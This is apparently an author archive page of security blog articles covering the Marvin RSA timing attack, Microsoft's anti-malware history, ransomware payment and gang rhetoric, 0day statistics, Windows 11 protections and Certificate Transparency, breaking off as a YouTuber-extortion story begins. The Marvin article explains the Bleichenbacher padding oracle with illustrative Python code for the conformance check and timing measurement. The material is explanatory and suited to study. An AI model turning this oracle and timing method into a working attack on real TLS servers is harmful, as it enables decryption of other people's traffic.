Sergio de los Santos

Innovation and Laboratory Director at Telefónica Tech. Computer systems engineer with a master's degree in software engineering and artificial intelligence from the University of Malaga.

Cyber Security
Marvin, the cryptographic bug that will never be fixed
There has been a flaw in the fundamental RSA encryption algorithm for 25 years. It reappears from time to time under different names and in different forms. Researchers have spent the last three years re-analyzing the problem and have discovered, among other things, that it will never be fixed. Along the way they achieved something impressive: perceiving processing-time differences of just a few CPU cycles in a server's response, across a production network miles away, hopping through six routers. They have christened the flaw Marvin: in the novel "The Hitchhiker's Guide to the Galaxy" (the same book the term "42" comes from), Marvin is the android that lasts until the end of the universe.

The bug dates back to 1998, when Daniel Bleichenbacher discovered that the error messages thrown by SSL servers when processing the padding of the PKCS#1 v1.5 format allowed attackers to decrypt the pre-shared key. Understanding the original bug is not that difficult, and it helps a lot in seeing why Marvin is a new-old problem.

Where does the problem come from? PKCS#1 is a format used with the RSA algorithm to pad messages that are too short, so that they cannot be easily decrypted. In SSL/TLS, the message sent is a pre-shared key (the premaster secret), which is not very long and must therefore be padded to the length of the modulus. If the pre-shared key is 48 bytes, whatever remains up to 256 bytes (a 2048-bit key) is padding. The encryption block is the concatenation: 0x00 + 0x02 + non-zero random filler bytes + 0x00 + pre-shared key. The leading 0x00 0x02 marks the beginning; the SSL/TLS server knows it must discard everything up to the next 0x00 separator, and that what follows is the part it is interested in.

The SSL/TLS server is used as an oracle for the attack. It is bombarded with crafted strings and, depending on whether it answers that the padding is correct or not, the attacker gradually recovers data. This was the origin of Bleichenbacher's original paper describing "the million message attack". Given the way RSA works, the attacker must recover m from the quantity m·s (mod n), where s is the multiplier hidden in each crafted message sent. The "oracle" server receives the crafted string as if it were a real ciphertext and decrypts it with the private key that the server knows but we do not. If we are lucky and the decryption happens to start with 0x00 0x02, followed by a run of non-zero bytes, then a 0x00 separator and a trailing string (something that happens roughly once every 30,000 to 130,000 attempts), the server replies that the message is well formatted, even though it was not encrypted with the right key. With that single binary answer, the attacker narrows down the range of possible plaintexts: m·s (mod n) must fall within a very specific interval, which can be narrowed further with more and more queries to the server. After several million queries, the attacker may know the answer.

But what if the server doesn't respond, leaving no oracle? That's when side-channel attacks come into play. Even if the server gives no explicit answer, there may be millisecond differences in its response time when a message, although incorrect, is well formatted. These slight time differences give the attacker the clue. This is an important detail for understanding Marvin.
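To make the oracle concrete, here is a minimal sketch in Python, purely illustrative and not taken from any real TLS stack, of the conformance check a vulnerable server effectively performs on the decrypted block:

```python
def pkcs1_v15_conformant(em: bytes) -> bool:
    """Return True if a decrypted RSA block looks like valid PKCS#1 v1.5
    encryption padding: 0x00 0x02 <at least 8 non-zero bytes> 0x00 <message>.

    A server that reveals this verdict, via an error message or a timing
    difference, becomes a Bleichenbacher oracle.
    """
    if len(em) < 11:                 # 2 header bytes + 8 padding bytes + separator
        return False
    if em[0] != 0x00 or em[1] != 0x02:
        return False
    try:
        sep = em.index(0x00, 2)      # first zero after the header ends the padding
    except ValueError:
        return False                 # no separator: no recoverable message
    return sep >= 10                 # enforce at least 8 non-zero padding bytes
```

Every positive answer tells the attacker that m·s (mod n) lies in the interval [2B, 3B), with B = 2^(8(k-2)) for a k-byte modulus, and the interval-narrowing phase of the attack feeds on exactly that information.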
Successive attacks

The PKCS standards were later improved to counter this attack: with RSA-OAEP, the padding is derived from hashes rather than being arbitrary, so completely random data no longer passes the format check. However, with slight variations, the attack remained possible thanks to timing side channels and to the fact that many SSL servers still use PKCS#1 v1.5. In fact, a variant of the attack was discovered in 2018. It was called ROBOT, "the Return of Bleichenbacher's Oracle Threat", and many servers were vulnerable. An attempt had been made to fix the original issue by playing with the timing, but ROBOT showed that the mitigation had been implemented incorrectly and that attacks with the same basics as the original were still possible. Successive fixes, intended to ensure that slight millisecond differences in server responses would not help the attacker, were thought to be sufficient. But no. Marvin, the new attack, which is essentially ROBOT but more precise, has given the problem another major twist. The researchers suspected since 2020 that the error was still there, and they started an investigation which concludes that, thanks to much more exhaustive measurement and more precise statistics, there is no real solution, because fixing implementations against "Marvin" is even harder than fixing them against ROBOT.

Time-based side channel attacks

Fundamentally, what they have achieved is precision in timing; they haven't invented anything new. It was simply believed that timing side-channel attacks were no longer possible, because the differences were so insignificant that they would give the attacker no clue. It was accepted that as long as response differences stayed in the order of nanoseconds, they would no longer be considered exploitable. According to the discoverers, however, the testing was simply not good enough. It took them three years to increase the volume and accuracy of their measurements until they could perceive differences on the order of a few CPU cycles in the response, across a production network miles away, hopping through six routers along the way. All thanks to enough collected data and better statistical techniques. Impressive. In GnuTLS, for instance, a time difference leaked from another part of the code (the part that decided what kind of error to show when debugging was active). Implementing a workaround for something like this means modifying the software so much that in practice it is impossible. These imperceptible details have resurrected side-channel attacks that were thought to be dead.

Therefore, since there is no possible implementation that is "side-channel free", anything that uses PKCS#1 v1.5 padding in RSA could be susceptible to attack with this new method. It affects almost everything: OpenSSL, GnuTLS, Mozilla's NSS (even after the patch, according to the discoverer), M2Crypto... The solution? Stop using PKCS#1 v1.5 in RSA for TLS (TLS 1.3 already does so, having abandoned this padding after many patches in previous versions). Nowadays it is also possible to switch to ECDSA instead of RSA.
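As a toy illustration of the statistical idea (not the researchers' actual methodology; send_probe is a hypothetical stand-in for sending one ciphertext and waiting for the reply), the approach is to gather very large timing samples per ciphertext class and compare low quantiles of the distributions, where network jitter masks the signal least:

```python
import statistics
import time

def time_probe(send_probe, n=100_000):
    """Collect n response-time samples (in nanoseconds) for one class of probe."""
    samples = []
    for _ in range(n):
        t0 = time.perf_counter_ns()
        send_probe()  # hypothetical: send the ciphertext, block until the reply
        samples.append(time.perf_counter_ns() - t0)
    return samples

def low_quantile_gap(a, b, q=5):
    """Gap between the q-th percentiles of two timing distributions.

    A persistent gap, however small, suggests the server's processing time
    depends on the padding, i.e., that a timing oracle exists.
    """
    qa = statistics.quantiles(a, n=100)[q - 1]
    qb = statistics.quantiles(b, n=100)[q - 1]
    return qa - qb
```

Real analyses such as ROBOT's and Marvin's go much further, with paired sampling and non-parametric statistical tests, but the principle is the same: with enough samples, a systematic difference of a few CPU cycles becomes visible through the noise.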
October 11, 2023
Cyber Security
Four cyber security milestones that shaped the future of malware
In early 2001, Bill Gates sent out a memo (shorthand for a company-wide email) that marked a historic moment. He acknowledged that he had come under fire from some of his largest customers (government agencies, financial companies and others) for security problems in Windows, problems that were being brought to the forefront by a series of self-replicating worms and embarrassing attacks. So something had to change, drastically: put the focus on cyber security, and get away from those "self-replicating worms". Windows was threatened by malware that would seem like a joke today. At the end of that same year, Windows XP was launched, and things got worse: more attacks and more problems.

Image: Windows XP (2001). Source: Microsoft.

But the strategy germinated. It took many years before Microsoft was able to reap the fruits of that initiative... because there were fruits. Let's review the pillars on which the initiative to change course was built. Microsoft has spent 15 years consolidating a strategy that has impacted cybersecurity globally.

Active measures and secure development

The "self-replicating worms" were simply malware that, taking advantage of some bug shared by every Windows installation, could run and infect other machines: exponential growth. Those bugs were essentially code vulnerabilities. So the enemy was not so much each individual virus or worm, but the vulnerabilities that made it possible for them to replicate on every Windows machine connected to the network. Microsoft focused that fight on its next operating system: Windows Vista. It was supposed to be released in 2004 but did not arrive until 2006, delayed by the attempt to make it more secure. One of its great achievements was to incorporate ASLR, which prevents the same bug from being exploitable in the same way on every Windows machine. In other words, it largely removed the possibility of programming "self-replicating worms". And, barring horrible exceptions such as WannaCry, which managed to evade ASLR protection, it is true that in general this plague was largely eradicated.

With Vista, despite its bad reputation in usability, substantial progress was made in the basic technologies for fighting malware and the way it exploits bugs. It laid the first stone: the project did not come to fruition until Windows 7, but it laid the groundwork. With Vista, Microsoft built the foundations for an effective fight against malware, although the results did not arrive until Windows 7. Although many users did not realize it, from that year onwards the server version of Windows and the system's internals began to include a good handful of measures aimed at eradicating the ways the most common vulnerabilities were exploited. More or less effective technologies such as CFG, MemGC, CIG, ACG... quietly made their way in to protect us, although, as is often the case with defensive technologies, they attract more attention for their failures than for their successes. All these functions were programmed under the umbrella of a secure development methodology, the Security Development Lifecycle (SDL), a way of programming that put cybersecurity at the center. This more secure programming effort is also being complemented by moving some of the code from C to Rust, to relieve the burden of manual memory management that causes so many bugs.

The Blue Hat Prize

Until 2011, Microsoft used to offer bounties to hunt down malware creators.
Typically, $250,000 for anyone who offered a clue leading to the arrest of the creator of a major virus of the moment: MyDoom, Conficker, Blaster... It was not a sustainable strategy. From 2011 onwards, something completely different was proposed: award $250,000 to any researcher who offered a technical improvement to Windows that would stop malware. Invest in techniques and protection measures instead of punishment. And so it did.

Image: Windows 10 (2015). Source: Microsoft.

Since then, Microsoft has implemented many formulas that today, in Windows 10, help make it harder for malware to replicate, and it did so by listening to the community and to researchers.

Antivirus included in Windows

Microsoft announced in June 2003 that it was acquiring antivirus technology. The antivirus houses looked on askance: a default antivirus in Windows? Despite all the doubts, the company finally made a good move. It introduced a very simple tool, the Malicious Software Removal Tool, which ran on the system from time to time and removed the most popular viruses, nothing too advanced. What was Microsoft's intention with this move? The goal was to take care of users, but also to capitalize on metadata. What it got was a good snapshot of the malware that was "out there", so it knew first-hand what was going on in its most unprotected systems and could, again, improve its defenses. Then came Windows Defender, which became memory-resident and still managed to coexist with traditional antivirus. Later, Windows 10 turned Defender into a whole security strategy for the operating system: "Defender" is now an umbrella that brings together Microsoft's global cybersecurity policy, not only on the desktop but also in the cloud.

EMET and Windows 10

In 2009 a tool called EMET was launched, aimed not so much at detecting viruses (of which there were millions) as at thwarting the techniques they used to spread (of which there are only dozens). It was free and almost "amateurish". However, its importance grew and, after six years of development, it was abandoned in favor of including its improvements as standard in Windows 10. Windows 10 thus incorporates anti-exploitation (and therefore anti-malware) improvements that had already proven their effectiveness outside a "production" environment. Although little known, it was a tool that really scared attackers, and its measures, now built in as standard, have made Windows 10 much less palatable to malware.

So, what does this mean?

The moral is that a solid cyber security strategy, with several open fronts, global in scope and in a changing environment, does not reap rewards at the first attempt. It took Microsoft almost 15 years (from the memo in 2001 to Windows 10 in 2015) to consolidate a strategy that has impacted cybersecurity globally and, in the meantime, of course, it suffered failures and faced many new milestones and challenges. This is a sliding window, but good ground has been gained. The threat has not disappeared; it has mutated into something that must continue to be fought with other weapons and will need new and better strategies. But none of that, nor the never-ending long-distance race that is cyber security, should make us forget that it is never too late to start an ambitious strategy. The only failed cybersecurity strategy is the one that is never implemented.

Featured photo: Ed Hardie / Unsplash.
May 22, 2023
Cyber Security
Pay When You Get Infected by Ransomware? Many Shades of Grey
The Internet is full of articles explaining why ransomware should not be paid. They are probably right, but if you don't distinguish between the type of ransomware and who is affected, the reasons given may not make as much sense. It is therefore necessary to consider the circumstances of the victim in order to understand why payment should not be made and, above all, to understand the situation well enough to make the right decisions.

Two Types of Ransomware

The first thing is to come clean about the fact that there are two types of ransomware.

"Domestic" attack

The first appeared massively around 2012, as a natural evolution of the "police virus" malware, and affected the average user. Since 2017 it has not disappeared, but its incidence has fallen considerably. These were attacks on unsuspecting random victims, demanding amounts that were large but still payable by an individual. This type of "domestic" attack has perhaps the more straightforward answer: do not pay unless there is a very good reason to. No one guarantees that the files will be returned (an amusing example is the anecdote in which, despite not having actually infected anything, the attacker still insisted on being paid). Nor does anyone guarantee that the victim will not be extorted again. And most of the time, it is more than likely that the user can continue to live without those files, data, etc. But... what if your business, livelihood, clients and future depend on recovering that data? Then the answer becomes more complicated.

Professional attack

This is not the time to blame the victim (they have enough on their plate already) because the backup was also encrypted, did not work, or simply never existed. In a professional ransomware attack everything is more complex: we are talking about campaigns that may have involved months of work and study by the attacker, with the sole objective of penetrating deep into the (sometimes enormous) network and, at the right moment, taking control and encrypting everything. By then it is too late.

Image by DCStudio on Freepik.

The whole system is encrypted, and sometimes it takes months to verify not only that the system has been recovered but also that the attackers cannot get in again. Here, thousands upon thousands of euros are lost every day because of the frustrating impossibility of running the business. The situation is much more critical and serious, which is why the attackers ask for millions of euros in ransom. At that moment a negotiation begins, because when there is so much at stake, not paying is not something that is dismissed out of hand. Just as with real-life kidnappings, payment is an option that is always considered, but always as the last option. In fact, it is an option that may end up being officially illegal. In July 2019, the United States Conference of Mayors recommended at its annual meeting not to pay: if you pay, you encourage the attackers to keep attacking, they said. That statement did not go beyond a purely "moral" position, as it was not binding. Things then went further: in January 2020, two proposals by two senators (one Democrat and one Republican) contemplated forbidding the spending of public money on these ransoms. The Republican senator also proposed the creation of a fund to help organisations improve their cybersecurity.
It keeps going further

The Office of Foreign Assets Control (OFAC) now warns that "companies that facilitate ransomware payments to cybercriminals on behalf of victims, including financial institutions, insurance companies and companies involved in forensic analysis and incident response, not only encourage future ransomware payment claims, but also risk violating OFAC regulations". The aim would be to fine everyone involved: those who pay, the intermediaries and those who receive the money (if they can be identified).

More Figures Than You Can Imagine

Actually, the recommendation is that instead of paying, one should cooperate with law enforcement and not involve "cover" intermediaries, on the grounds that doing so already amounts to something illegal and criminalized. The reason? Far more victims than we think are paying, to the point that the payment process itself has become a business.

Image by Pressfoto on Freepik.

The ransomware business has become industrialised both from the point of view of the attackers (very elaborate techniques, very professional treatment...) and from the point of view of the victims, who already use intermediaries and other figures, such as insurers, to deal with the crisis. When business continuity is critical, the affected companies open various channels. There is, of course, the technical recovery attempt, damage assessment, etc. But other "diplomatic" channels are also opened, which may include contact with the attackers and with other companies. With the attackers, you bargain and negotiate, establishing a line of dialogue as if it were any other kind of transaction. Extortionists may even offer useful advice once the victim has gone through the checkout line. And, like any negotiation, it can be delegated.

The intermediaries

In the light of this murky extortion business, intermediaries have emerged offering "consulting" services that handle the negotiation and the payment of the ransom. In this industrialized scenario, payment usually does guarantee recovery. Going even further, insurers can act as intermediaries. Depending on what the policy covers, these businesses may find it more profitable to pay the attackers than to compensate the affected party for the damage suffered. In short, it is a complex web where not everything is so clear-cut once we look at the figures involved, and one very distant from the domestic environment, where the guidelines are usually clearer. The new laws in the United States seek to strangle the extortionists by making their business unprofitable... but this measure may not be enough, because the continuity of legitimate businesses often matters more. Survival... not at any price, but at the one imposed (unfortunately) by criminals.

Featured photo: Omid Armin / Unsplash.
May 9, 2023
Cyber Security
Hypocrisy and doublespeak in ransomware gangs
The hypocrisy, doublespeak and even, we assume, sarcasm that ransomware gangs display on their websites have no limits. As an anecdote, we are going to show some of the statements and terms ransomware gangs use to justify their services, as if they were not full-fledged illegal extortion. We assume that the attackers' intention is similar to that of the classic mafias: far from outwardly acknowledging their illegal activity, they try to cloak the attack in some (albeit perverse) logic in which the victim becomes a "client" of the ransomware gang, or even guilty of the extortion itself for not caring about their data or infrastructure. Here are a few examples gathered from a look at their websites.

Babuk, a double standard

They attack everything they can and are very active and popular. They have a special grudge against Elon Musk: if they were to get into his systems, they say, they would publish everything without negotiation. But they have a red line: hospitals, NGOs, schools and small companies with profits of less than 4 million. An interesting distinction not found in many other groups.

Image: organisations safe from Babuk.

Babuk spend a lot of time "justifying themselves".

Image: Babuk's philosophy.

They call themselves cyberpunks who go around "testing cybersecurity". They literally describe themselves as "specialised, non-malicious software that exposes a company's cybersecurity problems". They add that their "audit" is not the worst thing that could happen, and that it would be much worse if fanatic terrorists, who unlike them do not just want money, were to attack the infrastructure.

Lorenz, nothing personal

They don't talk about their morals; they attack whatever they can. On their blog they keep one slot for attacked companies that have paid (and therefore had their data removed), and another for the published data of those who did not pay.

Image: slots for future victims and for those who have already paid.

But they remind visitors on their website that, of course, it is nothing personal. Just business.

LV, you are the one to blame

If LV attacks a company, encrypts and steals its data and ends up displaying it on their website, it is the victim's fault for not having fulfilled their obligations and for refusing to correct their failures: the victim has, in effect, preferred to let the company's own data, and that of its customers, be sold. This is the cynical message of a gang that blames the victim as if the victim had done something wrong. It is worth remembering here that ransomware gangs do not always exploit security flaws: they use all sorts of techniques, such as extorting employees to get the data they need for the theft.

Image: LV says the victim is careless.

LockBit, the most professional

They are so professional that they recently announced a bug bounty of their own, in which they could award up to a million dollars just for finding bugs in their infrastructure. They are very active and very good at marketing themselves as an affiliate program for ransomware, with very advanced encryption and exfiltration software, fast and very serious about their business. That's what they say. On their FAQ page we can find statements like these:

Image: what to target and what not to target.

Neither they nor their affiliates may encrypt critical systems such as nuclear plants, pipelines, etc. They can steal information from them, but not encrypt it. If in doubt, affiliates can contact the organisation's helpdesk.
They are also not allowed to attack post-Soviet countries, a restriction that has long been common in malware. Attacking NGOs is allowed without problems, as are educational institutions as long as they are not public. They recommend not attacking hospitals where deaths could result. And they encourage attacking as much law enforcement as possible because, they say, they do not appreciate the important work the police do in raising awareness of cybersecurity. If the victim doesn't pay up, they promise to keep the stolen company data available on their blog for as long as possible, so that everyone can learn from it. And so that this website cannot be taken down, they maintain a very robust anti-DDoS system with dozens of mirrors, as well as the aforementioned bug bounty to find potential flaws in their encryption system that could allow access to the data without paying.

Bl@ckt0r, the ransomware gang that claims not to be one

It's not that they're a ransomware gang, it's just that they love to go around looking at vulnerable companies, break into their systems, and ask for ransom money. But they mean no harm... unless you don't pay, of course.

Image: Bl@ckt0r neither encrypts nor deletes.

And they don't lie: they don't actually encrypt anything; they leak the data directly and sell it. This way they do not break business continuity. According to them, their services are a bargain, since they have alerted the company to potential security breaches. They also seem to have plenty of resources, such as contacts in the media, to make everyone aware that the data has been stolen. Hospitals, of course, are not touched.

Main image: Tyler Daviaux / Unsplash.
July 14, 2022
Cyber Security
0days in numbers: Chrome, Windows, Exchange... What are attackers and manufacturers looking for?
Very interesting data from Google's Project Zero, which tries to catalogue, find and disseminate 0days. It does not discover them directly, but rather "detects" them in any vendor's software when they are being exploited, provided the vendor declares it. Project Zero can then analyse, alert and help correct them, closing the door on attackers as soon as possible. They advocate proper 0day cataloguing and transparency to improve the community: the starting point, for example, is for vendors to properly label their vulnerabilities as in-the-wild (or not) when they are detected or corrected. This year they detected 58; the previous record was 28 in 2015. Project Zero has been tracking them since 2014.

0days are vulnerabilities found while already being exploited by attackers and, therefore, without a known patch.

The numbers from this tracking are rather interesting. Divided by major vendor during 2021, they look like the following chart.

Chart: 0days reported by vendor in 2021. Source: Project Zero.

Does this chart mean that Chrome has more flaws and is more vulnerable? Not at all. In fact, there is so much information to be gleaned from it that the argument needs breaking down.

Chrome

14 0days reported in 2021. The browser has undoubtedly been attracting the greatest interest from attackers for some time now, firstly because of the sheer number of attacks carried out through it, and secondly because bypassing Chrome's sandbox has always been a technical challenge. The target is now even more attractive, because Edge uses Chromium and some bugs may be shared. Six of these bugs were in the V8 JavaScript engine.

WebKit (Safari)

This was the first full year in which Apple reported 0days as such in WebKit, and there were 7, so no trend can really be established yet. Certainly a lot compared to its market share, but we already know that it is a juicy target, above all on iPhones. Again, 4 of them were in the JavaScript engine.

Internet Explorer

Yes, it still matters, given how embedded it is in the system; as a consequence, it is still Office's HTML engine. There have consistently been 3 or 4 0days per year since 2015.

Windows

10 0days. The curious thing is that, until now, the vast majority of them attacked win32k to escalate privileges: up to 75% of all 0days in previous years. In 2021, only 20% attacked this driver. Why? Because those attacks were aimed at versions prior to Windows 10, and as those versions disappear, the module becomes more complex to exploit. Although it may not seem like it, in this respect Windows 10 is more heavily shielded.

iOS/macOS

Always hermetic, Apple in 2021 for the first time reported 0days as such in its operating systems. There were 5 of them, one (the first ever) in macOS and the rest in iOS. Once again, iOS is a very interesting target for attackers in high geopolitical spheres; Pegasus is an example of this.

Android

We went from a single 0day in 2019, to none in 2020, to 7 in 2021. Of these 7, 5 were bugs in GPU drivers. Since the Android ecosystem is highly fragmented, it is difficult to write an exploit that works across most flavours of the operating system. A flaw in the GPU driver, however, means an attacker needs only two exploits: one for the Qualcomm Adreno GPU and one for the ARM Mali GPU.
It is curious how, not only on Android but on all other platforms, privilege escalations are what attackers value most. Why? Because getting the user to execute something is relatively easy thanks to social engineering.

Exchange Server

The big star of 2021. It appears for the first time since 2014, and it does so with 5 0days, although 4 of them were part of the same operation, the campaign related to ProxyLogon.

Conclusions

It will never be known how much remains unknown, or what fraction of all the 0days in use by attackers these 58 represent. At least this is the first year in which Apple has committed to labelling its vulnerabilities as known in-the-wild for WebKit, iOS and macOS. Most of these 58 0days follow the same practices as always: they build on known exploits and vulnerabilities to develop new, derivative exploits. Only two were new in their techniques and sophistication. And this is quite relevant, because as long as known methods, techniques and procedures are used, they are theoretically easier to detect, since they are "expected". This is where the industry should improve. Another conclusion is that these numbers show us something incomplete, part of a full map we do not know: these are only the vulnerabilities declared by the vendors as 0days detected in the wild. There will certainly be more, but we don't know how many. Google's call for all vendors to report their 0days as such is of great help in analysing the industry itself.
April 27, 2022
Cyber Security
Windows 11 security improves and joins Zero Trust
Windows 11, despite having been on the market since October 2021, has just announced its cybersecurity improvements. We are going to analyse the new functionalities, some of them old and even well known, but now applied by default or substantially improved. Naturally, the overall strategy had to be built on the fashionable concept of Zero Trust and on hybrid work, in several layers, and this is how they have organised it. Let's analyse them roughly, as not many technical details are known yet.

Image: Zero Trust approach in Windows 11.

Hardware: Pluton

Pluton is a processor dedicated solely to security, embedded in the Qualcomm and AMD Ryzen versions. That is, a TPM directly in the processor that stores, for example, BitLocker or Windows Hello keys. What is it for, and how does it improve on current TPMs? The fact that it is embedded prevents someone from physically opening the device and "sniffing" from the bus the information that travels between the TPM and the processor. After all, as complicated as it sounds, it is possible to capture BitLocker keys by connecting a piece of hardware to the bus and reading this traffic with the right program. In fact, during the official presentation of the functionality, there is quite a practical demonstration of the attack process.

Image: the attack to obtain the BitLocker password of a computer to which the attacker has physical access.

Windows 11 does not work without a TPM, but now it can also benefit from that TPM on the processor itself. In addition, Pluton's firmware will be managed by Windows' own updates, and it will be made open source so that other operating systems can use it.

Config Lock

Config Lock is simple to explain. In MDM-managed systems there was already Secured-Core PC (SCPC), a configuration that allowed the device to be controlled and managed by company administrators. With Config Lock, there is no longer a window of opportunity between a user-made change to a security setting and the enforcement of the security policy imposed by the administrators. If the user disables any security feature, it is immediately reverted to the state configured by the policy designer. The configuration is thus "locked" and no longer takes even minutes to be restored.

Personal Data Encryption

An interesting new feature. It basically encrypts files on top of BitLocker, with a layer of encryption that is also invisible to the user. The user does not have to remember or run anything to decrypt the data: it is accessible without friction after logging in with Windows Hello. If the user has not logged into Windows with Hello, the files remain encrypted and cannot be accessed. What is this for? As the example in the presentation shows, it prevents attacks that bypass the lock screen through direct access to unprotected DMA memory. An attacker who has not authenticated to the system through the "usual" channels, but has bypassed the lock screen, will not be able to access the files thanks to PDE. One layer above BitLocker's cold, at-rest encryption sits PDE's hot encryption. The PDE key is not known to the user; it is simply erased from memory when the system is locked and restored when it is unlocked with the usual login. It would also serve as additional protection if an attacker bypasses BitLocker. It seems to clash or overlap somewhat with the EFS functionality. How is this implemented?
If an attacker tries to access the data without being authenticated as the user (by bypassing the lock screen or mounting the disk on another computer), a closed padlock appears on the files along with a message prohibiting access.

Image: file cannot be accessed thanks to PDE.

Smart App Control

SAC seems very much oriented towards checking the signature and certificates of a binary's publisher. It tries to determine whether a program is legitimate (with a valid, correct certificate) before it even reaches Windows Defender, adding an extra layer of security. SAC is AI-based, which implies telemetry. Microsoft seems to be moving towards requiring by default that programs be signed or downloaded from a trusted repository, as macOS and Android already do. It improves on the usual SmartScreen, where Windows, thanks to its telemetry, tells you whether an app is legitimate or not, and also on AppLocker, which is more static. SAC is based on AI hosted in the cloud, learning from the user. In fact, activating it requires a reinstallation of the system, so that it can learn from scratch which programs are common on that computer.

Image: Smart App Control thinks the application is untrustworthy and sends you to the official Store.

Enhanced phishing protection for Microsoft Defender

This is perhaps one of the most interesting measures. Until now, SmartScreen protected the system from malicious URLs or suspicious domains via the browser (or, in professional versions, by other means). Now it goes further: Windows protects passwords at several levels, always watching where they are used or sent, whether that is a visible URL, an internal URL (the one the credentials actually travel to), or even whether they are stored insecurely. On the one hand, it observes the network connections of any application (including Teams) and, if it concludes that a password is travelling to a domain it should not, it alerts the user, even if that is not the main URL of the domain being visited. The image shows how a page pretending to be the Office login, embedded in Teams, is actually carrying the Office password to another domain (the connection is highlighted in the Fiddler sniffer).

Image: process of detecting that the password travels somewhere it shouldn't.

It goes even further. If you store passwords in a TXT file in Notepad, you will be alerted to the mistake. And if you reuse a password known to the operating system (in the picture, for example, on LinkedIn), it will also alert you to the problem this could pose. In this way, Windows as an operating system does not treat a password as just another string: it recognises it at all levels and monitors it throughout its use within the operating system. Could this lead to false positives with password-storage apps?

Image: alerts when reusing the password on LinkedIn and when storing it in a TXT file.

All these options can be disabled by the user.

Image: how to activate or deactivate these functions.

Windows 11 also enables VBS, virtualisation as a security feature, by default. Since the inclusion in 2008 of Hyper-V, Microsoft's software that takes advantage of the native virtualisation capabilities of Intel and AMD processors, this functionality has been used to improve security. The strategy is called Virtualization-Based Security, or VBS. It focuses on virtualising memory to isolate processes from each other as much as possible.
If an attacker exploits a flaw in the kernel and operates from there, there is still an even higher abstraction layer (or lower, depending on how you look at it) with more power than the kernel, which can block processes or access to certain resources even when the attacker already holds ring-0 privileges. Hence its usefulness. This is implemented with hypervisor-protected code integrity (HVCI), which prevents the injection of dynamic code into the kernel (as WannaCry did). In turn, this allows Credential Guard (not new, but underused) and LSASS protection to work directly, so that no unsigned code is loaded into this crucial process. That protection is also an old acquaintance (RunAsPPL in the registry, basically a protection against Mimikatz). All of these features, although already known, will be enabled as standard in Windows 11.
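As a quick illustration (a minimal sketch assuming the standard registry location of this setting, not an official tool), the RunAsPPL value mentioned above can be read with Python's built-in winreg module:

```python
import winreg

def lsass_ppl_enabled() -> bool:
    """Check whether LSASS is configured to run as a Protected Process Light
    (RunAsPPL), the mitigation against credential dumpers such as Mimikatz."""
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SYSTEM\CurrentControlSet\Control\Lsa",
    )
    try:
        value, _ = winreg.QueryValueEx(key, "RunAsPPL")
        return value in (1, 2)  # non-zero values enable the protection
    except FileNotFoundError:
        return False            # value absent: protection not configured
    finally:
        winreg.CloseKey(key)

if __name__ == "__main__":
    print("LSASS RunAsPPL enabled:", lsass_ppl_enabled())
```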
April 18, 2022
Cyber Security
Google takes a step forward to improve Certificate Transparency's ecosystem: No dependence on Google
Although Certificate Transparency (CT) is not well known among ordinary users, it affects them in many ways, improving the security of their connections to websites. What's more, it even affects their privacy, something they were certainly not taking into account. Now Google (the main promoter of CT) is taking a step towards making the ecosystem independent of Google itself, though CT's privacy problems still need improving.

What is Certificate Transparency? Briefly: when a certificate is created, it must be registered on public log servers; if it is not, it is suspected of having been created with bad intentions. To "register" it, a Signed Certificate Timestamp (SCT) is created: a signed cryptographic token given by a log server as a guarantee that the certificate has been registered with it. This SCT is embedded in the certificate and, when you visit a website, the browser checks that it is valid against several log servers, one of which had to be Google's (several certificate companies run public logs). If the check fails, an error is displayed. All this happens without the user being aware of it.

Image: an SCT embedded in the certificate, which the browser must check.

However, the SCT is more a promise to put the certificate in the log than a proof, because nothing prevents a log operator (who can be anyone) from colluding with an attacker: creating a certificate, granting it an SCT... but never actually publishing it in the log. This would invalidate the whole CT ecosystem. How did Google address it? Through two moves. The first: among the required logs (currently three) there always had to be a "Google log" where the certificate was registered. Google trusts itself and knows it will never cheat by issuing an SCT for a certificate it has not actually registered. The second is "SCT auditing" which, if poorly implemented, would imply a clear infringement of users' privacy. Both solutions have their problems. Let's look into them.

Image: Chrome showing the three logs where the SCT is valid. Always a Google one... until now.

At least one Google log

If Google doesn't trust other logs, why should anyone trust Google's? Because it was the best solution Google found at the time. A certificate would not be considered validly compliant with the Certificate Transparency ecosystem if it was not in a Google log... at least until this month, when that requirement was removed. The change ships in Chrome version 100. It is worth remembering that Apple already went its own way with Safari: in March 2021 it announced that it would not follow the policy of relying on Google, and that knowing the SCT was in two different logs was enough for it.

Privacy and SCT auditing

SCT auditing also arrived not long ago as one of the solutions for keeping the logs honest. The idea is simple: randomly audit SCTs and check that the corresponding certificates really are in the logs. But how? In the way Google knows best: using the user, and taking advantage of Chrome's adoption, to send the SCTs of visited sites to the logs and check that they have indeed been registered. There was a lot of talk about SCT auditing, but it amounted to an attack on user privacy and a problem to implement. Google did it anyway in the March 2021 version of Chrome, in the best way it knew how: it enabled SCT auditing only for users who already shared their visits with Google through Safe Browsing's enhanced data sharing.
Since this was something users had activated voluntarily, they were also enlisted as "SCT auditors" in passing. It is not the default option.

Image: announcement of how SCT auditing would work.

The two formulas described above help ensure that a malicious log does not issue an SCT for a certificate without actually logging it. But SCT auditing must have worked out well for Google, since it now seems to eliminate the first formula: as Safari already decided, from now on none of the logs needs to be specifically Google's. Therefore, to keep the logs honest, we are left with SCT auditing, where all the users who already share certain browsing data with Safe Browsing are, in turn, helping to secure the CT ecosystem. Firefox does not implement Certificate Transparency.
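For the curious, the embedded SCTs described above can be listed from any live certificate. Here is a minimal sketch using the third-party cryptography package (www.example.com is just a stand-in for a host whose certificate embeds SCTs; certificates without the extension will raise ExtensionNotFound):

```python
import ssl
from cryptography import x509
from cryptography.x509.oid import ExtensionOID

# Download the server's certificate and parse it.
pem = ssl.get_server_certificate(("www.example.com", 443))
cert = x509.load_pem_x509_certificate(pem.encode())

# The SCTs travel inside an X.509 extension of the certificate.
scts = cert.extensions.get_extension_for_oid(
    ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS
).value

for sct in scts:
    # Each SCT identifies the log and records when inclusion was promised.
    print(sct.log_id.hex(), sct.timestamp)
```

Matching each log_id against the public lists of known CT logs shows which operators vouched for the certificate, which is essentially the check Chrome performs behind the scenes.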
April 12, 2022
Cyber Security
Chronicle of the Attack on a YouTuber Who Knew About Cyber Security
The news recently broke: the youtubers with the largest followings are being targeted for extortion. The attacks are on the rise and the techniques are not new, but these attacks have been detected for some time now and continue to increase. In fact, they go back at least a little over a year, to when this story occurred.

The beginning of the attack

